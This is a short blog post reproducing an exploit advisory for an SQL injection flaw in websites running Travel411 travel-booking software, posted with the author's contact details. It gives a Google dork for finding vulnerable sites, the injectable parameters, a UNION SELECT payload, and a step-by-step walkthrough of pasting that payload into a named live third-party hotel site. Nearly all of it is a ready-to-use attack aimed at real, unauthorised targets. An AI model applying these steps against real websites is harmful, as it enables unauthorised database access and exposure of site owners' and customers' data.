SQL Injection Vulnerability Found in www.travel411.com: Live example
Greetz fly to Caddy-Dz
####
# Exploit Title: Travel411 SQL Injection Vulnerability# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com
# Category:: webapps
# Google dork: intext:"Powered by Travel411.com"
# Tested on: [Windows Vista Edition Intégrale]
# Vendor: http://www.travel411.com/
####
## ExPLo!T:
||>> Find Any File Like (info.php?id=) or (reservations.php?id=)
# http://127.0.0.1/info.php?id=SQLI
# http://127.0.0.1/info.php?id=-00030+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15--
###
Let me make it more simple.
Step 1: Open google.com
Step 2: Tpye intext:"Powered by Travel411.com"
Step 3: From the search result, find any link looks like info.php?id= or reservations.php?id=
Step 4: Open that link. I found below link:
www.hotels.net411.com/info.php?id=00012
Step 5: Replace 00012 from link and copy paste
-00030+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15--
and press enter. BOOOMM..Site is vulnerable to SQLi attack
No comments:
Post a Comment